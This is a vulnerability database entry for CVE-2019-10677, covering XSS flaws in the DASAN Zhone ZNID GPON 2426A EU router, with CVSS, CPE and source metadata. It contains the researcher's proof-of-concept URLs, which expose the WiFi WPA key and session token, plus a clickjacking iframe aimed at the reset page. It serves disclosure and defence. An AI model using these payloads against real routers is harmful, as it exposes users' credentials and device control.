VAR-201909-1467
Vulnerability from variot - Updated: 2023-12-18 12:27Multiple Cross-Site Scripting (XSS) issues in the web interface on DASAN Zhone ZNID GPON 2426A EU version S3.1.285 devices allow a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameter: /zhndnsdisplay.cmd (name), /wlsecrefresh.wl (wlWscCfgMethod, wl_wsc_reg). DASAN Zhone ZNID GPON 2426A EU The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. DASAN Zhone ZNID GPON 2426A EU is a wireless router from DASAN Korea. The vulnerability stems from the lack of proper validation of client data for web applications. An attacker could exploit the vulnerability to execute client code.
Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU
Date: 31.03.2019
Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl
Vendor Homepage: https://dasanzhone.com
Version: <= S3.1.285
Alternate Version: <= S3.0.738
Tested on: version S3.1.285 (alternate version S3.0.738)
CVE : CVE-2019-10677
= Reflected Cross-Site Scripting (XSS) =
http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp
= Stored Cross-Site Scripting (XSS) =
- WiFi network plaintext password
http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//
- CSRF token
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//
= Clickjacking =
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201909-1467",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "znid gpon 2426a eu",
"scope": "lte",
"trust": 1.0,
"vendor": "dasanzhone",
"version": "s3.1.285"
},
{
"model": "znid gpon 2426a eu",
"scope": "eq",
"trust": 0.8,
"vendor": "dasan zhone",
"version": "s3.1.285"
},
{
"model": "zhone znid gpon 2426a eu \u003c=s3.1.285",
"scope": null,
"trust": 0.6,
"vendor": "dasan",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-30709"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009066"
},
{
"db": "NVD",
"id": "CVE-2019-10677"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dasanzhone:znid_gpon_2426a_eu_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "s3.1.285",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dasanzhone:znid_gpon_2426a_eu:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10677"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Adam Ziaja",
"sources": [
{
"db": "PACKETSTORM",
"id": "154357"
},
{
"db": "CNNVD",
"id": "CNNVD-201909-178"
}
],
"trust": 0.7
},
"cve": "CVE-2019-10677",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-10677",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2019-30709",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-142247",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2019-10677",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-10677",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-30709",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201909-178",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-142247",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-30709"
},
{
"db": "VULHUB",
"id": "VHN-142247"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009066"
},
{
"db": "NVD",
"id": "CVE-2019-10677"
},
{
"db": "CNNVD",
"id": "CNNVD-201909-178"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple Cross-Site Scripting (XSS) issues in the web interface on DASAN Zhone ZNID GPON 2426A EU version S3.1.285 devices allow a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameter: /zhndnsdisplay.cmd (name), /wlsecrefresh.wl (wlWscCfgMethod, wl_wsc_reg). DASAN Zhone ZNID GPON 2426A EU The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. DASAN Zhone ZNID GPON 2426A EU is a wireless router from DASAN Korea. The vulnerability stems from the lack of proper validation of client data for web applications. An attacker could exploit the vulnerability to execute client code. \n\n# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU\n\n# Date: 31.03.2019\n\n# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl\n\n# Vendor Homepage: https://dasanzhone.com\n\n# Version: \u003c= S3.1.285\n\n# Alternate Version: \u003c= S3.0.738\n\n# Tested on: version S3.1.285 (alternate version S3.0.738)\n\n# CVE : CVE-2019-10677\n\n\n= Reflected Cross-Site Scripting (XSS) =\n\nhttp://192.168.1.1/zhndnsdisplay.cmd?fileKey=\u0026name=%3Cscript%3Ealert(1)%3C/script%3E\u0026interface=eth0.v1685.ppp\n\n\n= Stored Cross-Site Scripting (XSS) =\n\n* WiFi network plaintext password\n\nhttp://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//\n\nhttp://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=\u0027;alert(wpaPskKey);//\n\n* CSRF token\n\nhttp://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=\u0027;alert(sessionKey);//\n\n\n= Clickjacking =\n\n\u003chtml\u003e\u003cbody\u003e\u003ciframe src=\"http://192.168.1.1/resetrouter.html\"\u003e\u003c/iframe\u003e\u003c/body\u003e\u003c/html\u003e\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10677"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009066"
},
{
"db": "CNVD",
"id": "CNVD-2019-30709"
},
{
"db": "VULHUB",
"id": "VHN-142247"
},
{
"db": "PACKETSTORM",
"id": "154357"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-10677",
"trust": 3.2
},
{
"db": "PACKETSTORM",
"id": "154357",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009066",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201909-178",
"trust": 0.7
},
{
"db": "EXPLOITALERT",
"id": "33979",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2019-30709",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "47351",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-142247",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-30709"
},
{
"db": "VULHUB",
"id": "VHN-142247"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009066"
},
{
"db": "PACKETSTORM",
"id": "154357"
},
{
"db": "NVD",
"id": "CVE-2019-10677"
},
{
"db": "CNNVD",
"id": "CNNVD-201909-178"
}
]
},
"id": "VAR-201909-1467",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-30709"
},
{
"db": "VULHUB",
"id": "VHN-142247"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-30709"
}
]
},
"last_update_date": "2023-12-18T12:27:57.703000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dasannetworks.com/en/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-009066"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-142247"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009066"
},
{
"db": "NVD",
"id": "CVE-2019-10677"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/154357/dasan-zhone-znid-gpon-2426a-eu-cross-site-scripting.html"
},
{
"trust": 1.7,
"url": "https://adamziaja.com/poc/201903-xss-zhone.html"
},
{
"trust": 1.7,
"url": "https://blog.redteam.pl/2019/09/cve-2019-10677-dasan-zhone-znid.html"
},
{
"trust": 1.7,
"url": "https://redteam.pl/poc/dasan-zhone-znid-gpon-2426a-eu.html"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10677"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10677"
},
{
"trust": 0.6,
"url": "https://www.exploitalert.com/view-details.html?id=33979"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/47351"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wlsecrefresh.wl?wlwsccfgmethod=\u0027;alert(wpapskkey);//"
},
{
"trust": 0.1,
"url": "https://adamziaja.com"
},
{
"trust": 0.1,
"url": "https://dasanzhone.com"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/resetrouter.html\"\u003e\u003c/iframe\u003e\u003c/body\u003e\u003c/html\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/zhndnsdisplay.cmd?filekey=\u0026name=%3cscript%3ealert(1)%3c/script%3e\u0026interface=eth0.v1685.ppp"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wlsecrefresh.wl?wlwsccfgmethod=\u0027;alert(sessionkey);//"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpapskkey);//"
},
{
"trust": 0.1,
"url": "https://redteam.pl"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-30709"
},
{
"db": "VULHUB",
"id": "VHN-142247"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009066"
},
{
"db": "PACKETSTORM",
"id": "154357"
},
{
"db": "NVD",
"id": "CVE-2019-10677"
},
{
"db": "CNNVD",
"id": "CNNVD-201909-178"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-30709"
},
{
"db": "VULHUB",
"id": "VHN-142247"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009066"
},
{
"db": "PACKETSTORM",
"id": "154357"
},
{
"db": "NVD",
"id": "CVE-2019-10677"
},
{
"db": "CNNVD",
"id": "CNNVD-201909-178"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-09-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-30709"
},
{
"date": "2019-09-05T00:00:00",
"db": "VULHUB",
"id": "VHN-142247"
},
{
"date": "2019-09-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-009066"
},
{
"date": "2019-09-04T13:33:33",
"db": "PACKETSTORM",
"id": "154357"
},
{
"date": "2019-09-05T14:15:10.973000",
"db": "NVD",
"id": "CVE-2019-10677"
},
{
"date": "2019-09-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201909-178"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-09-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-30709"
},
{
"date": "2019-09-09T00:00:00",
"db": "VULHUB",
"id": "VHN-142247"
},
{
"date": "2019-09-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-009066"
},
{
"date": "2019-09-09T15:17:34.507000",
"db": "NVD",
"id": "CVE-2019-10677"
},
{
"date": "2019-09-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201909-178"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201909-178"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "DASAN Zhone ZNID GPON 2426A EU Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-30709"
},
{
"db": "CNNVD",
"id": "CNNVD-201909-178"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "154357"
},
{
"db": "CNNVD",
"id": "CNNVD-201909-178"
}
],
"trust": 0.7
}
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…